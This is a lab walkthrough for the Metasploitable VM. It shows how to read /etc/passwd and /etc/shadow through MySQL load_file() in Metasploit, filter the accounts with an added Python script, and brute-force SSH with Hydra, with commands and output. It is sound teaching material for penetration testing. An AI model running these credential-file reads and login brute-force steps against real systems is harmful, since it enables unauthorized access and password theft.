Metasploitable/SSH/Brute Force
From charlesreid1
This walks through using Hydra to brute-force login information on Metasploitable.
Also see Hydra.
Procedure
The first challenge, when cracking SSH credentials via brute force, is to find usernames. There are two methods to do this:
- Guess usernames from services
- Obtain usernames from a file on the machine
It would be great if we could log in via SSH as root, but root login is often disabled in sshd_config (PermitRootLogin no). To get anywhere we need a list of real users on the system. That list can be obtained in many ways; two methods that go through the database servers are covered in Metasploitable/MySQL and Metasploitable/Postgres. Both pages cover techniques for obtaining the contents of /etc/passwd with Metasploit.
Once we have usernames, we can go after the passwords.
- For password wordlists, use SecLists from Daniel Miessler on Github: https://github.com/danielmiessler/SecLists
- If we have usernames only, use Hydra to brute-force the credentials online, against the live SSH service
- If we have usernames and password hashes, use John the Ripper to crack the hashes offline
Usernames
Finding Usernames via Services
Services often create their own accounts, and administrators do not always lock them or disable SSH for them. If you're lucky, these service accounts have weaker passwords than the human ones. For example, if a server is running PostgreSQL there will be a "postgres" account; it may have a login shell, and its password may even be "postgres". Hydra's -e nsr option tries exactly these cases for every login (n: empty password, s: password identical to the login, r: login reversed), so it is worth running before any large wordlist.
Finding Usernames via MySQL
Hydra can be used to brute-force the SSH credentials. If you have a good guess for the username and password, then use Hydra.
However, if you don't know what username to use, and you know there is a MySQL server listening, you can crack the MySQL server's password and use the load_file() function in SQL to obtain the /etc/passwd or /etc/shadow file, and use those to obtain usernames and possibly password hashes. These may in turn lead to SSH usernames and passwords. Two caveats: load_file() requires the FILE privilege, and it can only read files the mysqld process itself can read. /etc/shadow is readable by root only, so on a normally configured system load_file('/etc/shadow') returns NULL; it works on Metasploitable because the MySQL server there can read the file. Newer MySQL releases also restrict load_file() to the directory named by secure_file_priv. It's a bit cumbersome, but who knows, you might get lucky and find some low-hanging fruit.
Obtaining Usernames Using SQL load_file Function
Usernames on the machine can be obtained from /etc/passwd if we get SQL credentials on the remote machine, because MySQL's load_file() function returns the contents of a file on the database server.
Here's the recap of getting the contents of that file from the Metasploitable machine's MySQL server (username is root, password is blank) using Metasploit:
Start metasploit:
root@morpheus:~# msfconsole
We're going to use the MySQL query auxiliary module (not an exploit: it simply runs a statement using credentials we already have), so load it up:
msf > use auxiliary/admin/mysql/mysql_sql
Once the module is loaded, we have to set the username and password to use. This requires us to know the username/password. You can try an empty password, or the word "password", etc. On Metasploitable, the MySQL root account has no password set by default:
msf auxiliary(mysql_sql) > set USERNAME root
USERNAME => root
msf auxiliary(mysql_sql) > set PASSWORD ''
PASSWORD =>
msf auxiliary(mysql_sql) > set RHOST 10.0.0.27
RHOST => 10.0.0.27
Last, we set the SQL statement that we want Metasploit to run once it connects:
msf auxiliary(mysql_sql) > set SQL select load_file(\'/etc/passwd\')
SQL => select load_file('/etc/passwd')
msf auxiliary(mysql_sql) > run
[*] Sending statement: 'select load_file('/etc/passwd')'...
[*]  | root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
mail:x:8:8:mail:/var/mail:/bin/sh
news:x:9:9:news:/var/spool/news:/bin/sh
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
proxy:x:13:13:proxy:/bin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh
backup:x:34:34:backup:/var/backups:/bin/sh
list:x:38:38:Mailing List Manager:/var/list:/bin/sh
irc:x:39:39:ircd:/var/run/ircd:/bin/sh
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
libuuid:x:100:101::/var/lib/libuuid:/bin/sh
dhcp:x:101:102::/nonexistent:/bin/false
syslog:x:102:103::/home/syslog:/bin/false
klog:x:103:104::/home/klog:/bin/false
sshd:x:104:65534::/var/run/sshd:/usr/sbin/nologin
msfadmin:x:1000:1000:msfadmin,,,:/home/msfadmin:/bin/bash
bind:x:105:113::/var/cache/bind:/bin/false
postfix:x:106:115::/var/spool/postfix:/bin/false
ftp:x:107:65534::/home/ftp:/bin/false
postgres:x:108:117:PostgreSQL administrator,,,:/var/lib/postgresql:/bin/bash
mysql:x:109:118:MySQL Server,,,:/var/lib/mysql:/bin/false
tomcat55:x:110:65534::/usr/share/tomcat5.5:/bin/false
distccd:x:111:65534::/:/bin/false
user:x:1001:1001:just a user,111,,:/home/user:/bin/bash
service:x:1002:1002:,,,:/home/service:/bin/bash
telnetd:x:112:120::/nonexistent:/bin/false
proftpd:x:113:65534::/var/run/proftpd:/bin/false
statd:x:114:65534::/var/lib/nfs:/bin/false
snmp:x:115:65534::/var/lib/snmp:/bin/false
 |
[*] Auxiliary module execution completed
Reading /etc/shadow
We can also grab the /etc/shadow file, which contains the password hashes. Some sample lines:
root:$1$/avpfBJ1$x0z8w5UF9Iv./DR9E9Lid.:14747:0:99999:7:::
daemon:*:14684:0:99999:7:::
bin:*:14684:0:99999:7:::
sys:$1$fUX6BPOt$Miyc3UpOzQJqz4s5wFD9l0:14742:0:99999:7:::
Each line has eight meaningful colon-separated fields (a ninth, reserved field is left empty):
- Username : the login name.
- Password : the hashed password in crypt(3) format. The $1$ prefix on the Metasploitable hashes means MD5-crypt; a * or ! here means the account has no usable password (see below).
- Last password change (lastchanged) : days since Jan 1, 1970 that the password was last changed.
- Minimum : the minimum number of days that must pass after a change before the user is allowed to change the password again.
- Maximum : the maximum number of days the password is valid (after that the user is forced to change it).
- Warn : the number of days before the password expires that the user is warned it must be changed.
- Inactive : the number of days after the password expires before the account is disabled.
- Expire : days since Jan 1, 1970 on which the account is disabled, i.e. an absolute date after which the login may no longer be used.
The most important two fields, then, are the first two:
root:$1$/avpfBJ1$x0z8w5UF9Iv./DR9E9Lid.:14747:0:99999:7:::
daemon:*:14684:0:99999:7:::
bin:*:14684:0:99999:7:::
sys:$1$fUX6BPOt$Miyc3UpOzQJqz4s5wFD9l0:14742:0:99999:7:::
The root and sys users both have real hashes, so password login is possible for them and we have something to crack. A * (or a !) in place of the hash means the account has no valid password: password authentication fails for it, locally or over SSH. Such an account can still be used if an SSH key has been installed for it, and a ! in front of a real hash marks an account that was locked with passwd -l; the hash behind the ! is still crackable offline.
This reduces the list of usable usernames to:
root@morpheus:~# cat users_file
root
sys
klog
msfadmin
postgres
user
service
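The filtering above can be scripted. The following is an added example, not code from the original wiki page: it parses /etc/passwd and /etc/shadow, drops every account whose password field is * or !, records whether the account's shell will actually give an interactive session, and emits the one-login-per-line file Hydra's -L option expects plus user:hash lines for John. The passwd lines and the root, daemon, bin and sys shadow lines are copied from the Metasploitable output above; all other shadow lines are constructed, including a guest account with an empty password field and a backup account locked with a ! in front of its hash, and their hash fields are placeholders, not real hashes.

```python
# Added example (not from the original wiki page): pick SSH brute-force
# candidates out of /etc/passwd and /etc/shadow and emit Hydra/John inputs.
# The passwd lines and the root/daemon/bin/sys shadow lines are copied from
# the Metasploitable output above; every other shadow line is CONSTRUCTED,
# with placeholder hash fields that are not real crypt(3) hashes.

PASSWD_SAMPLE = """\
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
backup:x:34:34:backup:/var/backups:/bin/sh
klog:x:103:104::/home/klog:/bin/false
sshd:x:104:65534::/var/run/sshd:/usr/sbin/nologin
msfadmin:x:1000:1000:msfadmin,,,:/home/msfadmin:/bin/bash
postgres:x:108:117:PostgreSQL administrator,,,:/var/lib/postgresql:/bin/bash
mysql:x:109:118:MySQL Server,,,:/var/lib/mysql:/bin/false
user:x:1001:1001:just a user,111,,:/home/user:/bin/bash
service:x:1002:1002:,,,:/home/service:/bin/bash
guest:x:1003:1003::/home/guest:/bin/bash
"""

SHADOW_SAMPLE = """\
root:$1$/avpfBJ1$x0z8w5UF9Iv./DR9E9Lid.:14747:0:99999:7:::
daemon:*:14684:0:99999:7:::
bin:*:14684:0:99999:7:::
backup:!$1$cccccccc$CONSTRUCTEDplaceholder:14684:0:99999:7:::
sys:$1$fUX6BPOt$Miyc3UpOzQJqz4s5wFD9l0:14742:0:99999:7:::
sync:*:14684:0:99999:7:::
klog:$1$cccccccc$CONSTRUCTEDplaceholder:14742:0:99999:7:::
sshd:*:14684:0:99999:7:::
msfadmin:$1$cccccccc$CONSTRUCTEDplaceholder:14684:0:99999:7:::
postgres:$1$cccccccc$CONSTRUCTEDplaceholder:14685:0:99999:7:::
mysql:!:14684:0:99999:7:::
user:$1$cccccccc$CONSTRUCTEDplaceholder:14699:0:99999:7:::
service:$1$cccccccc$CONSTRUCTEDplaceholder:14715:0:99999:7:::
guest::14742:0:99999:7:::
"""

# Shells that never give an interactive session.
NOLOGIN_SHELLS = {"/bin/false", "/usr/sbin/nologin", "/sbin/nologin", "/bin/sync"}

# crypt(3) prefixes John recognises in a shadow password field.
HASH_PREFIXES = {"$1$": "md5crypt", "$2a$": "bcrypt", "$2b$": "bcrypt", "$2y$": "bcrypt",
                 "$5$": "sha256crypt", "$6$": "sha512crypt", "$y$": "yescrypt"}


def parse_passwd(text):
    """Map user -> login shell for every well-formed (7-field) passwd line."""
    return {f[0]: f[6] for f in (l.split(":") for l in text.splitlines()) if len(f) == 7}


def parse_shadow(text):
    """Yield (user, password_field) for every well-formed (9-field) shadow line."""
    for f in (l.split(":") for l in text.splitlines()):
        if len(f) == 9:
            yield f[0], f[1]


def hash_type(field):
    """Name the crypt(3) scheme of a password field, or None if unrecognised."""
    return next((name for p, name in HASH_PREFIXES.items() if field.startswith(p)), None)


def classify(field):
    """Return (status, hash_type) for a shadow password field.
    empty  - blank field: login succeeds with an empty password
    locked - '*', '!', '!!' or a '!'-prefixed hash: password auth is refused
    hash   - a recognised crypt(3) hash, crackable offline
    other  - unrecognised scheme (legacy DES etc.), still worth trying
    For a '!'-locked entry the hash behind the lock is still reported, so it
    can go to John: the password may be reused elsewhere or the lock lifted."""
    if field == "":
        return "empty", None
    if field.startswith("!"):
        return "locked", hash_type(field.lstrip("!"))
    if field.startswith("*"):
        return "locked", None
    kind = hash_type(field)
    return ("hash" if kind else "other"), kind


def ssh_candidates(passwd_text, shadow_text):
    """Accounts Hydra can usefully try, in shadow order, as
    (user, status, hash_type, shell_ok).  Locked accounts are dropped.  A
    nologin shell does NOT exclude an account: sshd authenticates before it
    runs the shell, so Hydra still reports a hit and the session is still
    usable for port forwarding; shell_ok only says whether a successful
    login will also hand you an interactive shell."""
    shells = parse_passwd(passwd_text)
    out = []
    for user, field in parse_shadow(shadow_text):
        status, kind = classify(field)
        if status == "locked":
            continue
        shell = shells.get(user, "")
        out.append((user, status, kind, shell != "" and shell not in NOLOGIN_SHELLS))
    return out


def users_file(candidates):
    """Text of the file to pass to Hydra with -L: one login per line."""
    return "".join(user + "\n" for user, _, _, _ in candidates)


def john_input(shadow_text):
    """user:hash lines for John, including hashes hidden behind a '!' lock."""
    lines = []
    for user, field in parse_shadow(shadow_text):
        if classify(field)[1]:
            lines.append(f"{user}:{field.lstrip('!')}")
    return "\n".join(lines)


if __name__ == "__main__":
    cands = ssh_candidates(PASSWD_SAMPLE, SHADOW_SAMPLE)
    for user, status, kind, shell_ok in cands:
        print(f"{user:10} {status:6} {kind or '-':12} shell={'yes' if shell_ok else 'no'}")
    print("--- users_file ---")
    print(users_file(cands), end="")
    print("--- john input ---")
    print(john_input(SHADOW_SAMPLE))
```

Run it and the candidate list comes out as root, sys, klog, msfadmin, postgres, user, service (the same seven the hand-built users_file above contains) plus the constructed guest account, which is flagged "empty" because a blank second field means sshd will accept an empty password for it. klog is kept but marked shell=no, which is why a Hydra hit on it would not give you a shell even though the login succeeds.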
Passwords
Hydra
Hydra is an online brute-force tool: it tries username/password pairs against the live service, one connection at a time per task. Against SSH it is very slow and should only be used as a last-ditch attempt.
Usage
If we just type hydra, we can see the basic usage:
root@morpheus:~# hydra
Hydra v8.1 (c) 2014 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.

Syntax: hydra [[[-l LOGIN|-L FILE] [-p PASS|-P FILE]] | [-C FILE]] [-e nsr] [-o FILE] [-t TASKS] [-M FILE [-T TASKS]] [-w TIME] [-W TIME] [-f] [-s PORT] [-x MIN:MAX:CHARSET] [-SuvVd46] [service://server[:PORT][/OPT]]

Options:
  -l LOGIN or -L FILE  login with LOGIN name, or load several logins from FILE
  -p PASS  or -P FILE  try password PASS, or load several passwords from FILE
  -C FILE   colon separated "login:pass" format, instead of -L/-P options
  -M FILE   list of servers to attack, one entry per line, ':' to specify port
  -t TASKS  run TASKS number of connects in parallel (per host, default: 16)
  -U        service module usage details
  -h        more command line options (COMPLETE HELP)
  server    the target: DNS, IP or 192.168.0.0/24 (this OR the -M option)
  service   the service to crack (see below for supported protocols)
  OPT       some service modules support additional input (-U for module help)
From the help message, you can see Hydra supports cracking many more services than just SSH:
Supported services: asterisk cisco cisco-enable cvs firebird ftp ftps http[s]-{head|get} http[s]-{get|post}-form http-proxy http-proxy-urlenum icq imap[s] irc ldap2[s] ldap3[-{cram|digest}md5][s] mssql mysql nntp oracle-listener oracle-sid pcanywhere pcnfs pop3[s] postgres rdp redis rexec rlogin rsh s7-300 sip smb smtp[s] smtp-enum snmp socks5 ssh sshkey teamspeak telnet[s] vmauthd vnc xmpp
Reality Check
Quick reality check: brute-forcing SSH logins is very slow (it is limited by how many connections the victim's SSH server will accept, and OpenSSH's MaxStartups throttles unauthenticated connections), so if you have access to /etc/shadow, you might as well crack those hashes offline with John the Ripper.
Using Hydra to Crack SSH Credentials
Once we have a list of users, we can put that in a file and pass it to Hydra using the -L flag. We then pass a list of passwords to try using the -P flag. Here's a sample command:
# hydra -L users_file -P 500-worst-passwords.txt ssh://10.0.0.27:22
Hydra v8.1 (c) 2014 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.

Hydra (http://www.thc.org/thc-hydra) starting at 2016-03-25 21:45:13
[WARNING] Restorefile (./hydra.restore) from a previous session found, to prevent overwriting, you have 10 seconds to abort...
[DATA] max 4 tasks per 1 server, overall 64 tasks, 3549 login tries (l:7/p:507), ~13 tries per task
[DATA] attacking service ssh on port 22
[STATUS] 44.00 tries/min, 44 tries in 00:01h, 3505 todo in 01:20h, 4 active
Two things worth reading off that output. The [WARNING] line means an earlier run was interrupted and left a hydra.restore file; run hydra -R to resume it instead of starting over. The [DATA] line shows only 4 parallel tasks per host: the ssh module keeps parallelism low because OpenSSH drops unauthenticated connections beyond MaxStartups, so pushing -t higher produces dropped connections, not more throughput. At 44 tries a minute, 7 logins against 507 passwords takes about 80 minutes. Add -f to stop as soon as the first valid pair is found.
This is extremely slow when compared to an offline password-cracking method like John the Ripper; if we have the /etc/shadow file, we should use that instead of trying to brute-force SSH logins.
Brute-forcing SSH logins requires a lot of time, a lot of patience, and a series of very good guesses. In general, it is not terribly practical.
John the Ripper
If we are able to obtain a list of users and their password hashes, e.g., from /etc/shadow, we can use John to crack the passwords offline.
Use John to Crack Credentials
See Metasploitable/John_Shadow_File
Metasploit
You can also brute force an SSH login with Metasploit: use the auxiliary/scanner/ssh/ssh_login module, which takes the same user and password files.
See Metasploitable/SSH/Exploits#Brute_Force_ssh_login